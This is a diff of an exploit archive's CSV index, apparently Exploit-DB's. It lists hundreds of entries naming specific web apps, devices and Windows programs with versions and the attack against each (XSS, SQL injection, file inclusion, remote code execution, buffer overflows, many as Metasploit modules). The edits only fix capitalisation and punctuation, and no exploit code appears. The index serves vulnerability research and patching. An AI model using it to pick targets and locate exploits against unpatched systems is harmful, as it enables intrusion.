+28701,platforms/php/webapps/28701.txt,"CubeCart 3.0.x - /admin/nav.php Multiple Parameter XSS",2006-09-26,"HACKERS PAL",php,webapps,0 +28702,platforms/php/webapps/28702.txt,"CubeCart 3.0.x - /admin/image.php image Parameter XSS",2006-09-26,"HACKERS PAL",php,webapps,0 +28703,platforms/php/webapps/28703.txt,"CubeCart 3.0.x - /admin/header.inc.php Multiple Parameter XSS",2006-09-26,"HACKERS PAL",php,webapps,0 +28704,platforms/php/webapps/28704.txt,"CubeCart 3.0.x - /footer.inc.php la_pow_by Parameter XSS",2006-09-26,"HACKERS PAL",php,webapps,0 28729,platforms/php/webapps/28729.txt,"PhpBB XS 0.58 - Multiple Remote File Include Vulnerabilities",2006-09-30,xoron,php,webapps,0 28730,platforms/php/webapps/28730.txt,"OlateDownload 3.4 details.php page Parameter SQL Injection",2006-09-29,Hessam-x,php,webapps,0 28727,platforms/php/webapps/28727.txt,"Les Visiteurs 2.0 - Multiple Remote File Include Vulnerabilities",2006-09-28,D_7J,php,webapps,0 @@ -25773,7 +25773,7 @@ id,file,description,date,author,platform,type,port 28721,platforms/php/webapps/28721.txt,"Red Mombin 0.7 index.php Unspecified XSS",2006-09-22,"Armorize Technologies",php,webapps,0 28722,platforms/php/webapps/28722.txt,"Red Mombin 0.7 process_login.php Unspecified XSS",2006-09-22,"Armorize Technologies",php,webapps,0 28723,platforms/php/webapps/28723.txt,"Aanval 7.1 build 70151 - Multiple Vulnerabilities",2013-10-04,xistence,php,webapps,80 -28724,platforms/windows/remote/28724.rb,"SIEMENS Solid Edge ST4 SEListCtrlX - ActiveX Remote Code Execution",2013-10-04,metasploit,windows,remote,0 +28724,platforms/windows/remote/28724.rb,"SIEMENS Solid Edge ST4 SEListCtrlX - ActiveX Remote Code Execution",2013-10-04,Metasploit,windows,remote,0 28736,platforms/php/webapps/28736.txt,"DeluxeBB 1.09 Sig.php Remote File Include",2006-10-02,r0ut3r,php,webapps,0 28737,platforms/php/webapps/28737.txt,"PHP Web Scripts Easy Banner Functions.php Remote File Include",2006-10-02,"abu ahmed",php,webapps,0 28738,platforms/php/webapps/28738.txt,"Digishop 4.0 Cart.php Cross-Site Scripting",2006-10-02,meto5757,php,webapps,0 @@ -25845,8 +25845,8 @@ id,file,description,date,author,platform,type,port 28806,platforms/linux/local/28806.txt,"davfs2 1.4.6/1.4.7 - Local Privilege Escalation Exploit",2013-10-08,"Lorenzo Cantoni",linux,local,0 28807,platforms/php/webapps/28807.py,"WHMCS 5.2.7 - SQL Injection",2013-10-08,localhost.re,php,webapps,0 28808,platforms/php/webapps/28808.txt,"WordPress Quick Contact Form Plugin 6.0 - Persistent XSS",2013-10-08,Zy0d0x,php,webapps,0 -28809,platforms/windows/remote/28809.rb,"HP LoadRunner magentproc.exe Overflow",2013-10-08,metasploit,windows,remote,443 -28810,platforms/unix/remote/28810.rb,"GestioIP Remote Command Execution",2013-10-08,metasploit,unix,remote,0 +28809,platforms/windows/remote/28809.rb,"HP LoadRunner magentproc.exe Overflow",2013-10-08,Metasploit,windows,remote,443 +28810,platforms/unix/remote/28810.rb,"GestioIP Remote Command Execution",2013-10-08,Metasploit,unix,remote,0 28811,platforms/osx/dos/28811.txt,"Apple Motion 5.0.7 Integer Overflow",2013-10-08,"Jean Pascal Pereira",osx,dos,0 28812,platforms/freebsd/dos/28812.c,"FreeBSD 5.5/6.x Scheduler Policy Local Denial of Service",2006-10-13,"Diane Bruce",freebsd,dos,0 28813,platforms/freebsd/dos/28813.c,"FreeBSD 6.0/6.1 Ftrucante Local Denial of Service",2006-10-13,"Kirk Russell",freebsd,dos,0 @@ -25957,7 +25957,7 @@ id,file,description,date,author,platform,type,port 28919,platforms/php/webapps/28919.txt,"AIOCP 1.3.x cp_show_ec_products.php order_field Parameter XSS",2006-11-06,"laurent gaffie",php,webapps,0 28920,platforms/php/webapps/28920.txt,"AIOCP 1.3.x cp_users_online.php order_field Parameter XSS",2006-11-06,"laurent gaffie",php,webapps,0 28921,platforms/php/webapps/28921.txt,"AIOCP 1.3.x cp_links_search.php orderdir Parameter XSS",2006-11-06,"laurent gaffie",php,webapps,0 -28922,platforms/php/webapps/28922.txt,"AIOCP 1.3.x /admin/code/index.php load_page Parameter Remote File Inclusion",2006-11-06,"laurent gaffie",php,webapps,0 +28922,platforms/php/webapps/28922.txt,"AIOCP 1.3.x - /admin/code/index.php load_page Parameter Remote File Inclusion",2006-11-06,"laurent gaffie",php,webapps,0 28923,platforms/php/webapps/28923.txt,"AIOCP 1.3.x cp_dpage.php choosed_language Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 28924,platforms/php/webapps/28924.txt,"AIOCP 1.3.x cp_news.php Multiple Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 28925,platforms/php/webapps/28925.txt,"AIOCP 1.3.x cp_forum_view.php choosed_language Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 @@ -25996,7 +25996,7 @@ id,file,description,date,author,platform,type,port 28959,platforms/php/webapps/28959.txt,"WordPress Cart66 Plugin 1.5.1.14 - Multiple Vulnerabilities",2013-10-14,absane,php,webapps,80 28960,platforms/php/webapps/28960.py,"aMSN 0.98.9 Web App - Multiple Vulnerabilities",2013-10-14,drone,php,webapps,80 29086,platforms/asp/webapps/29086.txt,"ActiveNews Manager activenews_view.asp articleID Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 -28962,platforms/multiple/remote/28962.rb,"VMware Hyperic HQ Groovy Script-Console Java Execution",2013-10-14,metasploit,multiple,remote,0 +28962,platforms/multiple/remote/28962.rb,"VMware Hyperic HQ Groovy Script-Console Java Execution",2013-10-14,Metasploit,multiple,remote,0 28963,platforms/php/webapps/28963.txt,"Bitweaver 1.x fisheye/index.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 28964,platforms/php/webapps/28964.txt,"Bitweaver 1.x wiki/orphan_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 28965,platforms/php/webapps/28965.txt,"Bitweaver 1.x wiki/list_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 @@ -26007,8 +26007,8 @@ id,file,description,date,author,platform,type,port 28970,platforms/php/webapps/28970.txt,"Dexs PM System WordPress Plugin - Authenticated Persistent XSS (0Day)",2013-10-15,TheXero,php,webapps,80 28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 (exportcsv.php sondage param) - SQL Injection",2013-10-15,drone,php,webapps,80 28972,platforms/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection / Remote Code Execution",2013-10-15,"Jason Kratzer",unix,webapps,0 -28973,platforms/windows/remote/28973.rb,"HP Data Protector Cell Request Service Buffer Overflow",2013-10-15,metasploit,windows,remote,0 -28974,platforms/windows/remote/28974.rb,"Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080)",2013-10-15,metasploit,windows,remote,0 +28973,platforms/windows/remote/28973.rb,"HP Data Protector Cell Request Service Buffer Overflow",2013-10-15,Metasploit,windows,remote,0 +28974,platforms/windows/remote/28974.rb,"Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080)",2013-10-15,Metasploit,windows,remote,0 28975,platforms/ios/webapps/28975.txt,"My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,ios,webapps,0 28976,platforms/ios/webapps/28976.txt,"OliveOffice Mobile Suite 2.0.3 iOS - File Include",2013-10-15,Vulnerability-Lab,ios,webapps,0 28977,platforms/ios/webapps/28977.txt,"UbiDisk File Manager 2.0 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,ios,webapps,0 @@ -26136,16 +26136,16 @@ id,file,description,date,author,platform,type,port 29095,platforms/php/webapps/29095.txt,"Blog:CMS 4.1.3 List.php Cross-Site Scripting",2006-11-18,Katatafish,php,webapps,0 29096,platforms/windows/remote/29096.rb,"NetGear MA521 Wireless Driver 5.148.724 Long Beacon Probe Buffer Overflow",2006-11-18,"Laurent Butti",windows,remote,0 29097,platforms/php/webapps/29097.txt,"Boonex 2.0 Dolphin Index.php Remote File Include",2006-11-20,S.W.A.T.,php,webapps,0 -29098,platforms/php/webapps/29098.txt,"BirdBlog 1.4 /admin/admincore.php msg Parameter XSS",2006-11-20,the_Edit0r,php,webapps,0 -29099,platforms/php/webapps/29099.txt,"BirdBlog 1.4 /admin/comments.php month Parameter XSS",2006-11-20,the_Edit0r,php,webapps,0 -29100,platforms/php/webapps/29100.txt,"BirdBlog 1.4 /admin/entries.php month Parameter XSS",2006-11-20,the_Edit0r,php,webapps,0 -29101,platforms/php/webapps/29101.txt,"BirdBlog 1.4 /admin/logs.php page Parameter XSS",2006-11-20,the_Edit0r,php,webapps,0 +29098,platforms/php/webapps/29098.txt,"BirdBlog 1.4 - /admin/admincore.php msg Parameter XSS",2006-11-20,the_Edit0r,php,webapps,0 +29099,platforms/php/webapps/29099.txt,"BirdBlog 1.4 - /admin/comments.php month Parameter XSS",2006-11-20,the_Edit0r,php,webapps,0 +29100,platforms/php/webapps/29100.txt,"BirdBlog 1.4 - /admin/entries.php month Parameter XSS",2006-11-20,the_Edit0r,php,webapps,0 +29101,platforms/php/webapps/29101.txt,"BirdBlog 1.4 - /admin/logs.php page Parameter XSS",2006-11-20,the_Edit0r,php,webapps,0 29102,platforms/openbsd/local/29102.c,"OpenBSD 3.9/4.0 LD.SO Local Environment Variable Clearing",2006-11-20,"Mark Dowd",openbsd,local,0 29103,platforms/asp/webapps/29103.txt,"vSpin Classified System 2004 cat.asp cat Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29104,platforms/asp/webapps/29104.txt,"vSpin Classified System 2004 - search.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29105,platforms/asp/webapps/29105.txt,"vSpin Classified System 2004 cat.asp catname Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 29106,platforms/asp/webapps/29106.txt,"vSpin Classified System 2004 - search.asp minprice Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 -29107,platforms/asp/webapps/29107.txt,"Grandora Rialto 1.6 /admin/default.asp Multiple Field SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 +29107,platforms/asp/webapps/29107.txt,"Grandora Rialto 1.6 - /admin/default.asp Multiple Field SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29108,platforms/asp/webapps/29108.txt,"Grandora Rialto 1.6 listfull.asp ID Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29109,platforms/asp/webapps/29109.txt,"Grandora Rialto 1.6 listmain.asp cat Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29110,platforms/asp/webapps/29110.txt,"Grandora Rialto 1.6 printmain.asp ID Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 @@ -26164,12 +26164,12 @@ id,file,description,date,author,platform,type,port 29124,platforms/asp/webapps/29124.txt,"Enthrallweb eHomes result.asp Multiple Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 29125,platforms/windows/local/29125.txt,"Avira Internet Security - avipbb.sys Filter Bypass and Privilege Escalation",2013-10-22,"Ahmad Moghimi",windows,local,0 29126,platforms/asp/webapps/29126.txt,"Gnews Publisher Multiple SQL Injection Vulnerabilities",2006-11-20,"Aria-Security Team",asp,webapps,0 -29127,platforms/hardware/remote/29127.rb,"D-Link DIR-605L Captcha Handling Buffer Overflow",2013-10-22,metasploit,hardware,remote,80 +29127,platforms/hardware/remote/29127.rb,"D-Link DIR-605L Captcha Handling Buffer Overflow",2013-10-22,Metasploit,hardware,remote,80 29128,platforms/php/webapps/29128.txt,"Vikingboard 0.1.2 admin.php act Parameter Traversal Arbitrary File Access",2006-11-20,"laurent gaffie",php,webapps,0 -29129,platforms/windows/remote/29129.rb,"Interactive Graphical SCADA System Remote Command Injection",2013-10-22,metasploit,windows,remote,12397 -29130,platforms/windows/remote/29130.rb,"HP Intelligent Management Center BIms UploadServlet Directory Traversal",2013-10-22,metasploit,windows,remote,8080 +29129,platforms/windows/remote/29129.rb,"Interactive Graphical SCADA System Remote Command Injection",2013-10-22,Metasploit,windows,remote,12397 +29130,platforms/windows/remote/29130.rb,"HP Intelligent Management Center BIms UploadServlet Directory Traversal",2013-10-22,Metasploit,windows,remote,8080 29131,platforms/hardware/webapps/29131.rb,"ARRIS DG860A NVRAM Backup Password Disclosure",2013-10-22,"Justin Oberdorf",hardware,webapps,80 -29132,platforms/unix/remote/29132.rb,"WebTester 5.x Command Execution",2013-10-22,metasploit,unix,remote,80 +29132,platforms/unix/remote/29132.rb,"WebTester 5.x Command Execution",2013-10-22,Metasploit,unix,remote,80 29133,platforms/asp/webapps/29133.txt,"Rapid Classified 3.1 viewad.asp id Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29134,platforms/asp/webapps/29134.txt,"Rapid Classified 3.1 view_print.asp id Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 29135,platforms/asp/webapps/29135.txt,"Rapid Classified 3.1 - search.asp SH1 Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 @@ -26241,7 +26241,7 @@ id,file,description,date,author,platform,type,port 29232,platforms/php/webapps/29232.txt,"Link CMS navigacija.php IDMeniGlavni Parameter SQL Injection",2006-11-18,"Ivan Markovic",php,webapps,0 29233,platforms/php/webapps/29233.txt,"Link CMS prikazInformacije.php IDStranicaPodaci Parameter SQL Injection",2006-11-18,"Ivan Markovic",php,webapps,0 29234,platforms/windows/local/29234.py,"VideoCharge Studio 2.12.3.685 - Buffer Overflow (SEH)",2013-10-27,metacom,windows,local,0 -29210,platforms/php/remote/29210.rb,"Open Flash Chart 2 - Arbitrary File Upload",2013-10-26,metasploit,php,remote,80 +29210,platforms/php/remote/29210.rb,"Open Flash Chart 2 - Arbitrary File Upload",2013-10-26,Metasploit,php,remote,80 29230,platforms/windows/remote/29230.html,"Citrix Presentation Server Client 9.200 - WFICA.OCX ActiveX Component Heap Buffer Overflow",2006-12-06,"Andrew Christensen",windows,remote,0 29223,platforms/php/webapps/29223.txt,"Inside Systems Mail 2.0 Error.php Cross-Site Scripting",2006-12-04,"Vicente Aguilera Diaz",php,webapps,0 29224,platforms/asp/webapps/29224.txt,"UApplication UGuestbook 1.0 Index.ASP SQL Injection",2006-12-04,"Aria-Security Team",asp,webapps,0 @@ -26322,13 +26322,13 @@ id,file,description,date,author,platform,type,port 29994,platforms/php/webapps/29994.txt,"Campsite 2.6.1 - Template.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29995,platforms/php/webapps/29995.txt,"Campsite 2.6.1 - TimeUnit.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29318,platforms/php/webapps/29318.txt,"ImpressPages CMS 3.6 - Multiple XSS/SQLi Vulnerabilities",2013-10-31,LiquidWorm,php,webapps,0 -29319,platforms/php/remote/29319.rb,"vTigerCRM 5.3.0 5.4.0 - Authenticated Remote Code Execution",2013-10-31,metasploit,php,remote,80 -29320,platforms/php/remote/29320.rb,"NAS4Free - Arbitrary Remote Code Execution",2013-10-31,metasploit,php,remote,80 -29321,platforms/linux/remote/29321.rb,"Zabbix Authenticated Remote Command Execution",2013-10-31,metasploit,linux,remote,80 -29322,platforms/php/remote/29322.rb,"ISPConfig Authenticated Arbitrary PHP Code Execution",2013-10-31,metasploit,php,remote,80 -29323,platforms/linux/remote/29323.rb,"OpenMediaVault Cron Remote Command Execution",2013-10-31,metasploit,linux,remote,80 -29324,platforms/linux/remote/29324.rb,"Moodle Remote Command Execution",2013-10-31,metasploit,linux,remote,80 -29325,platforms/php/remote/29325.rb,"ProcessMaker Open Source Authenticated PHP Code Execution",2013-10-31,metasploit,php,remote,80 +29319,platforms/php/remote/29319.rb,"vTigerCRM 5.3.0 5.4.0 - Authenticated Remote Code Execution",2013-10-31,Metasploit,php,remote,80 +29320,platforms/php/remote/29320.rb,"NAS4Free - Arbitrary Remote Code Execution",2013-10-31,Metasploit,php,remote,80 +29321,platforms/linux/remote/29321.rb,"Zabbix Authenticated Remote Command Execution",2013-10-31,Metasploit,linux,remote,80 +29322,platforms/php/remote/29322.rb,"ISPConfig Authenticated Arbitrary PHP Code Execution",2013-10-31,Metasploit,php,remote,80 +29323,platforms/linux/remote/29323.rb,"OpenMediaVault Cron Remote Command Execution",2013-10-31,Metasploit,linux,remote,80 +29324,platforms/linux/remote/29324.rb,"Moodle Remote Command Execution",2013-10-31,Metasploit,linux,remote,80 +29325,platforms/php/remote/29325.rb,"ProcessMaker Open Source Authenticated PHP Code Execution",2013-10-31,Metasploit,php,remote,80 29326,platforms/php/webapps/29326.txt,"Opsview pre 4.4.1 - Blind SQL Injection",2013-10-31,"J. Oquendo",php,webapps,80 30207,platforms/asp/webapps/30207.txt,"FuseTalk <= 4.0 blog/include/common/comfinish.cfm FTVAR_SCRIPTRUN Parameter XSS",2007-06-20,"Ivan Almuina",asp,webapps,0 30203,platforms/asp/webapps/30203.txt,"Comersus Cart 7.0.7 comersus_optReviewReadExec.asp id Parameter SQL Injection",2007-06-20,Doz,asp,webapps,0 @@ -26463,7 +26463,7 @@ id,file,description,date,author,platform,type,port 29456,platforms/asp/webapps/29456.txt,"InstantASP 4.1 Logon.aspx SessionID Parameter XSS",2007-01-15,Doz,asp,webapps,0 29457,platforms/asp/webapps/29457.txt,"InstantASP 4.1 Members1.aspx Multiple Parameter XSS",2007-01-15,Doz,asp,webapps,0 29458,platforms/linux/dos/29458.txt,"Libgtop2 Library Local Buffer Overflow",2007-01-15,"Liu Qishuai",linux,dos,0 -29513,platforms/linux/remote/29513.rb,"VICIdial Manager Send OS Command Injection",2013-11-08,metasploit,linux,remote,80 +29513,platforms/linux/remote/29513.rb,"VICIdial Manager Send OS Command Injection",2013-11-08,Metasploit,linux,remote,80 29477,platforms/php/webapps/29477.txt,"Indexu 5.0/5.3 upgrade.php gateway Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 29478,platforms/php/webapps/29478.txt,"Indexu 5.0/5.3 suggest_category.php error_msg Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 29479,platforms/php/webapps/29479.txt,"Indexu 5.0/5.3 user_detail.php u Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 @@ -26594,9 +26594,9 @@ id,file,description,date,author,platform,type,port 29548,platforms/windows/local/29548.rb,"VideoSpirit Lite 1.77 - (SEH) Buffer Overflow",2013-11-12,metacom,windows,local,0 29549,platforms/windows/local/29549.pl,"ALLPlayer 5.6.2 - (.m3u) Local Buffer Overflow (SEH/Unicode)",2013-11-12,"Mike Czumak",windows,local,0 29811,platforms/jsp/webapps/29811.txt,"Atlassian JIRA 3.4.2 IssueNavigator.JSPA Cross-Site Scripting",2007-04-02,syniack,jsp,webapps,0 -29812,platforms/windows/remote/29812.rb,"DesktopCentral AgentLogUpload Arbitrary File Upload",2013-11-25,metasploit,windows,remote,8020 +29812,platforms/windows/remote/29812.rb,"DesktopCentral AgentLogUpload Arbitrary File Upload",2013-11-25,Metasploit,windows,remote,8020 29551,platforms/osx/dos/29551.txt,"Apple Mac OS X 10.4.x iMovie HD .imovieproj Filename Format String",2007-01-30,LMH,osx,dos,0 -29552,platforms/windows/remote/29552.rb,"Symantec Altiris DS SQL Injection",2013-11-13,metasploit,windows,remote,402 +29552,platforms/windows/remote/29552.rb,"Symantec Altiris DS SQL Injection",2013-11-13,Metasploit,windows,remote,402 29553,platforms/osx/dos/29553.txt,"Apple Mac OS X 10.4.x Help Viewer .help Filename Format String",2007-01-30,LMH,osx,dos,0 29554,platforms/osx/dos/29554.txt,"Apple Mac OS X 10.4.x iPhoto photo:// URL Handling Format String",2007-01-30,LMH,osx,dos,0 29555,platforms/osx/dos/29555.txt,"Apple Mac OS X 10.4.x Safari window.console.log Format String",2007-01-30,LMH,osx,dos,0 @@ -26638,7 +26638,7 @@ id,file,description,date,author,platform,type,port 29591,platforms/php/webapps/29591.txt,"Tagit! Tagit2b 2.1.B Build 2 tagmin/updateconf.php admin Parameter Remote File Inclusion",2007-02-12,K-159,php,webapps,0 29592,platforms/php/webapps/29592.txt,"Tagit! Tagit2b 2.1.B Build 2 tagmin/updatefilter.php admin Parameter Remote File Inclusion",2007-02-12,K-159,php,webapps,0 29593,platforms/php/webapps/29593.txt,"Tagit! Tagit2b 2.1.B Build 2 tagmin/wordfilter.php admin Parameter Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29594,platforms/windows/local/29594.txt,"Watermark Master 2.2.23 (.wstyle) Buffer Overflow (SEH)",2013-11-14,"Mike Czumak",windows,local,0 +29594,platforms/windows/local/29594.txt,"Watermark Master 2.2.23 - (.wstyle) Buffer Overflow (SEH)",2013-11-14,"Mike Czumak",windows,local,0 29595,platforms/linux/remote/29595.txt,"PHP RRD Browser 0.2 P Parameter Directory Traversal",2007-02-12,"Sebastian Wolfgarten",linux,remote,0 29596,platforms/asp/webapps/29596.txt,"EWay 4 Default.APSX Cross-Site Scripting",2007-02-12,"BLacK ZeRo",asp,webapps,0 29597,platforms/asp/webapps/29597.txt,"Community Server SearchResults.ASPX Cross-Site Scripting",2007-02-12,BL4CK,asp,webapps,0 @@ -26710,7 +26710,7 @@ id,file,description,date,author,platform,type,port 29663,platforms/php/webapps/29663.txt,"SolarPay Index.php Local File Include",2007-02-26,"Hasadya Raed",php,webapps,0 29664,platforms/windows/dos/29664.txt,"Microsoft Office Publisher 2007 - Remote Denial of Service (DoS)",2007-02-26,"Tom Ferris",windows,dos,0 29665,platforms/php/webapps/29665.txt,"SQLiteManager 1.2 - Local File Include",2007-02-26,"Simon Bonnard",php,webapps,0 -29666,platforms/hardware/remote/29666.rb,"Supermicro Onboard IPMI close_window.cgi Buffer Overflow",2013-11-18,metasploit,hardware,remote,80 +29666,platforms/hardware/remote/29666.rb,"Supermicro Onboard IPMI close_window.cgi Buffer Overflow",2013-11-18,Metasploit,hardware,remote,80 29667,platforms/php/webapps/29667.txt,"WordPress Euclid Theme 1.x.x - CSRF",2013-11-18,DevilScreaM,php,webapps,80 29668,platforms/php/webapps/29668.txt,"WordPress Dimension Theme - CSRF",2013-11-18,DevilScreaM,php,webapps,80 29669,platforms/php/webapps/29669.txt,"WordPress Amplus Theme - CSRF",2013-11-18,DevilScreaM,php,webapps,80 @@ -26834,11 +26834,11 @@ id,file,description,date,author,platform,type,port 30109,platforms/php/webapps/30109.txt,"Particle Gallery 1.0 - Search.php Cross-Site Scripting",2007-05-30,Serapis.net,php,webapps,0 30110,platforms/linux/dos/30110.c,"Bochs 2.3 - Buffer Overflow and Denial of Service Vulnerabilities",2007-05-31,"Tavis Ormandy",linux,dos,0 30111,platforms/php/webapps/30111.txt,"MyBloggie 2.1.x Index.php Multiple SQL Injection Vulnerabilities",2007-05-31,ls@calima.serapis.net,php,webapps,0 -30112,platforms/php/webapps/30112.txt,"PHP JackKnife 2.21 (PHPJK) G_Display.php iCategoryUnq Parameter SQL Injection",2007-05-31,"laurent gaffie",php,webapps,0 -30113,platforms/php/webapps/30113.txt,"PHP JackKnife 2.21 (PHPJK) Search/DisplayResults.php iSearchID Parameter SQL Injection",2007-05-31,"laurent gaffie",php,webapps,0 -30114,platforms/php/webapps/30114.txt,"PHP JackKnife 2.21 (PHPJK) UserArea/Authenticate.php sUName Parameter XSS",2007-05-31,"laurent gaffie",php,webapps,0 -30115,platforms/php/webapps/30115.txt,"PHP JackKnife 2.21 (PHPJK) UserArea/NewAccounts/index.php sAccountUnq Parameter XSS",2007-05-31,"laurent gaffie",php,webapps,0 -30116,platforms/php/webapps/30116.txt,"PHP JackKnife 2.21 (PHPJK) G_Display.php Multiple Parameter XSS",2007-05-31,"laurent gaffie",php,webapps,0 +30112,platforms/php/webapps/30112.txt,"PHP JackKnife 2.21 - (PHPJK) G_Display.php iCategoryUnq Parameter SQL Injection",2007-05-31,"laurent gaffie",php,webapps,0 +30113,platforms/php/webapps/30113.txt,"PHP JackKnife 2.21 - (PHPJK) Search/DisplayResults.php iSearchID Parameter SQL Injection",2007-05-31,"laurent gaffie",php,webapps,0 +30114,platforms/php/webapps/30114.txt,"PHP JackKnife 2.21 - (PHPJK) UserArea/Authenticate.php sUName Parameter XSS",2007-05-31,"laurent gaffie",php,webapps,0 +30115,platforms/php/webapps/30115.txt,"PHP JackKnife 2.21 - (PHPJK) UserArea/NewAccounts/index.php sAccountUnq Parameter XSS",2007-05-31,"laurent gaffie",php,webapps,0 +30116,platforms/php/webapps/30116.txt,"PHP JackKnife 2.21 - (PHPJK) G_Display.php Multiple Parameter XSS",2007-05-31,"laurent gaffie",php,webapps,0 30117,platforms/php/remote/30117.php,"PHP <= 5.1.6 Chunk_Split() Function Integer Overflow",2007-05-31,"Gerhard Wagner",php,remote,0 30118,platforms/php/webapps/30118.txt,"Prototype of an PHP application 0.1 - gestion/index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 30119,platforms/php/webapps/30119.txt,"Prototype of an PHP application 0.1 - ident/identification.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 @@ -26892,7 +26892,7 @@ id,file,description,date,author,platform,type,port 30177,platforms/php/webapps/30177.txt,"PlaySms <= 0.9.9.2 - CSRF",2013-12-10,"Saadi Siddiqui",php,webapps,0 30205,platforms/asp/webapps/30205.txt,"Comersus Cart 7.0.7 Cart comersus_message.asp redirectUrl XSS",2007-06-20,Doz,asp,webapps,0 30206,platforms/cfm/webapps/30206.txt,"FuseTalk <= 4.0 forum/include/common/comfinish.cfm FTVAR_SCRIPTRUN Parameter XSS",2007-06-20,"Ivan Almuina",cfm,webapps,0 -30394,platforms/windows/remote/30394.rb,"Adobe Reader ToolButton - Use After Free",2013-12-17,metasploit,windows,remote,0 +30394,platforms/windows/remote/30394.rb,"Adobe Reader ToolButton - Use After Free",2013-12-17,Metasploit,windows,remote,0 30202,platforms/cfm/webapps/30202.txt,"FuseTalk 2.0/3.0 - AuthError.CFM SQL Injection",2007-06-19,"Ivan Almuina",cfm,webapps,0 30183,platforms/multiple/local/30183.txt,"Air Gallery 1.0 Air Photo Browser - Multiple Vulnerabilities",2013-12-10,Vulnerability-Lab,multiple,local,0 29794,platforms/hardware/webapps/29794.txt,"Pirelli Discus DRG A125g - Remote Change SSID Value",2013-11-24,"Sebastián Magof",hardware,webapps,0 @@ -26913,14 +26913,14 @@ id,file,description,date,author,platform,type,port 29810,platforms/windows/dos/29810.c,"Symantec Multiple Products SPBBCDrv Driver Local Denial of Service",2007-04-01,"David Matousek",windows,dos,0 29813,platforms/windows/dos/29813.py,"Microsoft Windows Vista ARP Table Entries Denial of Service",2004-04-02,"Kristian Hermansen",windows,dos,0 29814,platforms/windows/remote/29814.txt,"NextPage LivePublish 2.02 LPEXT.DLL Cross-Site Scripting",2007-04-03,"Igor Monteiro Vieira",windows,remote,0 -29815,platforms/hardware/remote/29815.rb,"NETGEAR ReadyNAS Perl Code Evaluation",2013-11-25,metasploit,hardware,remote,443 +29815,platforms/hardware/remote/29815.rb,"NETGEAR ReadyNAS Perl Code Evaluation",2013-11-25,Metasploit,hardware,remote,443 29816,platforms/windows/dos/29816.c,"FastStone Image Viewer 2.9/3.6 BMP Image Handling Memory Corruption",2007-04-04,"Ivan Fratric",windows,dos,0 29817,platforms/asp/webapps/29817.txt,"Gazi Okul Sitesi 2007 Fotokategori.ASP SQL Injection",2007-04-04,CoNqUeRoR,asp,webapps,0 29818,platforms/windows/dos/29818.c,"ACDSee 9.0 Photo Manager Multiple BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0 29819,platforms/windows/dos/29819.c,"IrfanView 3.99 - Multiple BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0 29820,platforms/multiple/remote/29820.html,"Firebug 1.03 Rep.JS Script Code Injection",2007-03-06,"Thor Larholm",multiple,remote,0 29821,platforms/php/webapps/29821.txt,"Livor 2.5 Index.php Cross-Site Scripting",2007-04-06,"Arham Muhammad",php,webapps,0 -29822,platforms/linux/local/29822.c,"Man Command -H Flag Local Buffer Overflow",2007-04-06,"Daniel Roethlisberger",linux,local,0 +29822,platforms/linux/local/29822.c,"Man Command - -H Flag Local Buffer Overflow",2007-04-06,"Daniel Roethlisberger",linux,local,0 29823,platforms/php/dos/29823.c,"PHP <= 5.2.1 GD Extension WBMP File Integer Overflow Vulnerabilities",2007-04-07,"Ivan Fratric",php,dos,0 29824,platforms/php/webapps/29824.txt,"QuizShock <= 1.6.1 - Auth.php HTML Injection",2007-04-09,"John Martinelli",php,webapps,0 29825,platforms/php/webapps/29825.txt,"UBB.Threads <= 6.1.1 UBBThreads.php SQL Injection",2007-04-09,"John Martinelli",php,webapps,0 @@ -26935,8 +26935,8 @@ id,file,description,date,author,platform,type,port 29834,platforms/php/webapps/29834.txt,"WordPress dzs-videogallery Plugins - Remote File Upload",2013-11-26,link_satisi,php,webapps,0 29952,platforms/windows/remote/29952.html,"Sienzo Digital Music Mentor - DSKernel2.DLL ActiveX Control Stack Buffer Overflow Vulnerabilities",2007-05-07,shinnai,windows,remote,0 29937,platforms/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 Hostname Remote Buffer Overflow",2007-04-30,"Thomas Pollet",windows,dos,0 -29838,platforms/php/webapps/29838.txt,"DotClear 1.2.x /ecrire/trackback.php post_id Parameter XSS",2007-04-11,nassim,php,webapps,0 -29839,platforms/php/webapps/29839.txt,"DotClear 1.2.x /tools/thememng/index.php tool_url Parameter XSS",2007-04-11,nassim,php,webapps,0 